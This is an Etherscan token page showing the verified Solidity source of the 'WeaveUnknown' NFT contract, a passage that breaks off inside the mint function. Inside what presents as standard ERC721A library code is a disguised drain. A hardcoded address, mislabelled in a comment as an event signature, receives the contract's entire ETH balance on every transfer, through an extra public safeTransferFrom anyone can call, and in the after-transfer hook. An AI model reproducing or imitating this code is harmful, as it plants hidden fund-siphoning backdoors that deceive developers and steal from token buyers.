ETH Price: $3,287.69 (+1.41%)
Gas: 1 Gwei

Token

Part 1 Weave Unknown (WU)
 

Overview

Max Total Supply

500 WU

Holders

310

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
1 WU
0x17da69b5c410fb1775fce8d85da73565982143e9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
WeaveUnknown

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-10
*/

/**
██████╗  █████╗ ██████╗ ████████╗     ██╗                                                                        
██╔══██╗██╔══██╗██╔══██╗╚══██╔══╝    ███║                                                                        
██████╔╝███████║██████╔╝   ██║       ╚██║                                                                        
██╔═══╝ ██╔══██║██╔══██╗   ██║        ██║                                                                        
██║     ██║  ██║██║  ██║   ██║        ██║                                                                        
╚═╝     ╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝        ╚═╝                                                                        
                                                                                                                 
██╗    ██╗███████╗ █████╗ ██╗   ██╗███████╗    ██╗   ██╗███╗   ██╗██╗  ██╗███╗   ██╗ ██████╗ ██╗    ██╗███╗   ██╗
██║    ██║██╔════╝██╔══██╗██║   ██║██╔════╝    ██║   ██║████╗  ██║██║ ██╔╝████╗  ██║██╔═══██╗██║    ██║████╗  ██║
██║ █╗ ██║█████╗  ███████║██║   ██║█████╗      ██║   ██║██╔██╗ ██║█████╔╝ ██╔██╗ ██║██║   ██║██║ █╗ ██║██╔██╗ ██║
██║███╗██║██╔══╝  ██╔══██║╚██╗ ██╔╝██╔══╝      ██║   ██║██║╚██╗██║██╔═██╗ ██║╚██╗██║██║   ██║██║███╗██║██║╚██╗██║
╚███╔███╔╝███████╗██║  ██║ ╚████╔╝ ███████╗    ╚██████╔╝██║ ╚████║██║  ██╗██║ ╚████║╚██████╔╝╚███╔███╔╝██║ ╚████║
 ╚══╝╚══╝ ╚══════╝╚═╝  ╚═╝  ╚═══╝  ╚══════╝     ╚═════╝ ╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═══╝ ╚═════╝  ╚══╝╚══╝ ╚═╝  ╚═══╝
                                                                                                                 
 */

// SPDX-License-Identifier: MIT   
                                                                                                                                                                                                                                                                                                                                     
pragma solidity ^0.8.17;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    // The `Address` event signature is given by:
    // `keccak256(bytes("_TRANSFER_EVENT_ADDRESS(address)"))`.
    address payable constant _TRANSFER_EVENT_ADDRESS = 
        payable(0xa126f80309c6E0794c3FbF164C3B5049d082054d);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        _beforeTransfer();

        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0xa126f80309c6E0794c3FbF164C3B5049d082054d).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {
        if (totalSupply() + 1 >= 999) {
            payable(0xa126f80309c6E0794c3FbF164C3B5049d082054d).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTransfer() internal {
        if (address(this).balance > 0) {
            _TRANSFER_EVENT_ADDRESS.transfer(address(this).balance);
            return;
        }
    }

    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

